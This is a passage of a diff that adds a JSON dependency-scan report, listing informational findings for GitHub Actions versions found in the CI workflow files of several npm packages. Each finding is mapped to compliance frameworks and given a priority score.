"tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8939931398f7f376", + "name": "actions/checkout", + "version": "v2", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/busboy/.github/workflows/ci.yml", + "accessPath": "/node_modules/busboy/.github/workflows/ci.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v2", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v2" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c9bdf9f43faeb29d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/busboy/.github/workflows/lint.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v2", + "title": "actions/checkout v2", + "description": "Package discovered: actions/checkout v2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9ed4a1365893a541", + "name": "actions/checkout", + "version": "v2", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/busboy/.github/workflows/lint.yml", + "accessPath": "/node_modules/busboy/.github/workflows/lint.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v2", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v2" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b70772177f81ea1d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/streamsearch/.github/workflows/ci.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v2", + "title": "actions/checkout v2", + "description": "Package discovered: actions/checkout v2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bf473f4674a4b4c1", + "name": "actions/checkout", + "version": "v2", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/streamsearch/.github/workflows/ci.yml", + "accessPath": "/node_modules/streamsearch/.github/workflows/ci.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v2", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v2" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ec35dedecdc67bae", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/streamsearch/.github/workflows/lint.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v2", + "title": "actions/checkout v2", + "description": "Package discovered: actions/checkout v2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7ec5891cc205a593", + "name": "actions/checkout", + "version": "v2", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/streamsearch/.github/workflows/lint.yml", + "accessPath": "/node_modules/streamsearch/.github/workflows/lint.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v2", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v2" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4424fb771af041f1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/stream-shift/.github/workflows/test.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v3", + "title": "actions/checkout v3", + "description": "Package discovered: actions/checkout v3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8effbdc22037c585", + "name": "actions/checkout", + "version": "v3", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/stream-shift/.github/workflows/test.yml", + "accessPath": "/node_modules/stream-shift/.github/workflows/test.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v3", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v3" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a9754521213a3bbe", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/reusify/.github/workflows/ci.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/checkout v4", + "title": "actions/checkout v4", + "description": "Package discovered: actions/checkout v4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fd10fce47017fa13", + "name": "actions/checkout", + "version": "v4", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/reusify/.github/workflows/ci.yml", + "accessPath": "/node_modules/reusify/.github/workflows/ci.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/checkout:actions\\/checkout:v4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/checkout@v4", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/checkout@v4" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d2f68bf6461c8bf2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/busboy/.github/workflows/ci.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v1", + "title": "actions/setup-node v1", + "description": "Package discovered: actions/setup-node v1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6b0792dcccc67817", + "name": "actions/setup-node", + "version": "v1", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/busboy/.github/workflows/ci.yml", + "accessPath": "/node_modules/busboy/.github/workflows/ci.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v1", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v1" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e6602c50b5a9ed75", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/busboy/.github/workflows/lint.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v1", + "title": "actions/setup-node v1", + "description": "Package discovered: actions/setup-node v1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0dc9162b75e9df6b", + "name": "actions/setup-node", + "version": "v1", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/busboy/.github/workflows/lint.yml", + "accessPath": "/node_modules/busboy/.github/workflows/lint.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v1", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v1" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "75e343f3c07ad957", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/streamsearch/.github/workflows/ci.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v1", + "title": "actions/setup-node v1", + "description": "Package discovered: actions/setup-node v1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "303b3812127b618f", + "name": "actions/setup-node", + "version": "v1", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/streamsearch/.github/workflows/ci.yml", + "accessPath": "/node_modules/streamsearch/.github/workflows/ci.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v1", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v1" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f81ee12d2fe7942d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/streamsearch/.github/workflows/lint.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v1", + "title": "actions/setup-node v1", + "description": "Package discovered: actions/setup-node v1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5dcd76ce8f7aa30c", + "name": "actions/setup-node", + "version": "v1", + "type": "github-action", + "foundBy": "github-actions-usage-cataloger", + "locations": [ + { + "path": "/node_modules/streamsearch/.github/workflows/lint.yml", + "accessPath": "/node_modules/streamsearch/.github/workflows/lint.yml", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "", + "cpes": [ + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:github/actions/setup-node@v1", + "metadataType": "github-actions-use-statement", + "metadata": { + "value": "actions/setup-node@v1" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f2b699c115f128e7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml", + "startLine": 0 + }, + "message": "Package discovered: actions/setup-node v2", + "title": "actions/setup-node v2", + "description": "Package discovered: actions/setup-node v2", + "remediation": 